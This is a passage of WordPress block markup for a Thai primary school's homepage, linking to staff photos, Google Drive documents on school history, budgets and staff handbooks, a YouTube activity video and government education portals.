wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_ed3ec7-1c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_ed3ec7-1c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-538\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508661855_122233182278202781_1372776762413040353_n.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" 